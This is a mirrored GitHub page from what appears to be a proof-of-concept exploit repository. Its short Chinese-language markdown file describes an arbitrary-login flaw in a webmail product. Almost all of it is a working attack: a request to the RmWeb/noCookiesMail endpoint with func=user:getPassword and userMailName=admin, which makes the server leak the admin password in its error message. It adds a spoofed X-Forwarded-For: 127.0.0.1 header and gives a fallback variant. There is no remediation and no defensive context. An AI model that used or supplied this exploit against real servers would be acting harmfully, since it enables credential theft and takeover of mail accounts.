POC00/WEBMAIL存在任意用户登录漏洞.md at 1637ac33fb3cf7fffb755d3352fc6838d8f818d0

crazywhalecc/POC00

Fork 0

mirror of https://github.com/wooluo/POC00.git synced 2026-03-17 20:44:53 +08:00

wy876 1637ac33fb

Create WEBMAIL存在任意用户登录漏洞.md

2023-08-21 21:14:00 +08:00

334 B

Raw Blame History

WEBMAIL存在任意用户登录漏洞

RmWeb/noCookiesMail?func=user:getPassword&userMailName=admin
回显errormsg为密码
用户名为 admin
添加头 X-Forwarded-For: 127.0.0.1

如果有登录失败的话，使用
/RmWeb/noCookiesMail?func=user:getPassword&userMailName=admin@+证书 or 根域名获取 errormsg 登录

334 B Raw Blame History

WEBMAIL存在任意用户登录漏洞

334 B

Raw Blame History